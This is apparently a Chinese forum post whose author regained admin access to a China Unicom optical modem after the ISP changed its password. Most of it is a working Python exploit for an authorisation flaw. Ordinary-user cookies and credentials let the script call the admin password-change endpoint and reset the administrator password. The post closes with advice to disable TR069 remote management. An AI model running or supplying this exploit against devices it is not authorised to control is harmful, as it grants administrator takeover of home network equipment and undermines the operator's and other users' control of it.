TLDR: 联通的光猫接口鉴权有漏洞,使用普通账号的cookie可以调用管理员密码修改接口
今天运营商远程把我联通光猫的管理员密码改了,在网上找了很多方法都失效,最后找到一个鉴权漏洞,只需要光猫普通用户的用户名密码即可修改管理员密码,代码如下:
import re
import requests
class CU:
    """Thin session wrapper around the ONT's HTTP management pages.

    Keeps the base URL, the ordinary-user credentials and the cookie jar
    returned by ``login``.  Usable as a context manager so that ``logout``
    always runs when the ``with`` block ends.
    """

    def __init__(self, ip, user, pwd):
        # Plain HTTP only: the credentials and the session cookie travel in
        # clear text on the local segment.
        self.url = f'http://{ip}'
        self.user = user
        self.pwd = pwd
        self.cookies = None  # set by login(), cleared again by logout()

    def __enter__(self):
        self.login(self.pwd)
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.logout()

    def login(self, pwd):
        """POST the credentials to login.cgi and keep whatever cookies come back.

        The HTTP status is not inspected: a rejected login simply leaves an
        empty cookie jar instead of raising.
        """
        form = {'name': self.user, 'pswd': pwd}
        reply = requests.post(
            f'{self.url}/login.cgi',
            data=form,
            allow_redirects=False,
        )
        self.cookies = reply.cookies

    def logout(self):
        """Call the logout URL with the current cookies, then forget them."""
        requests.get(f'{self.url}/?out', cookies=self.cookies)
        self.cookies = None

    def get_csrf_token(self):
        """Scrape the ``csrf_token`` value embedded in user.cgi.

        Raises IndexError when the page carries no token (for example when no
        session cookie is held).
        """
        page = requests.get(
            f'{self.url}/user.cgi',
            cookies=self.cookies,
            headers={'Referer': 'http://192.168.1.1/'},
        )
        matches = re.findall('(?<=csrf_token=)[^\']*', page.text)
        return matches[0]

    def change_user_pwd(self, new):
        """Change the ordinary user's own password via ``user.cgi?set``.

        ``upswd`` is the current password, which the device checks; the stored
        ``self.pwd`` is updated so later calls keep working.
        """
        form = {
            'csrf_token': self.get_csrf_token(),
            'upswd': self.pwd,
            'pswdNew': new,
            'pswdConfirm': new,
            'act': '',
            'tr69_flag': '',
        }
        requests.post(f'{self.url}/user.cgi?set', data=form, cookies=self.cookies)
        self.pwd = new

    def change_adm_pwd(self, new):
        """Submit the administrator-password form (``user.cgi?set_super``).

        Only the ordinary user's cookie and current password are sent.  That
        the device honours this request without an administrator session is
        the missing server-side role check this page describes; the proper fix
        is on the device, which should tie ``set_super`` to the admin role.
        """
        form = {
            'csrf_token': self.get_csrf_token(),
            'upswd': self.pwd,
            'pswdNewSuper': new,
            'pswdConfirmSuper': new,
            'act': '',
            'tr69_flag': '',
        }
        requests.post(f'{self.url}/user.cgi?set_super', data=form, cookies=self.cookies)
if __name__ == '__main__':
    # Credentials are hard-coded here; the script is meant to be run by hand
    # against the device on the local segment.
    ont_ip = '192.168.1.1'
    login_name = 'user'
    login_pwd = 'pvam3tub'
    with CU(ont_ip, login_name, login_pwd) as session:
        session.change_adm_pwd('88888888')
PS:如果不想NTR,可以管理员账号登录光猫把上行先例中的TR069给禁用咯,这样运营商就无法远程配置
5分到手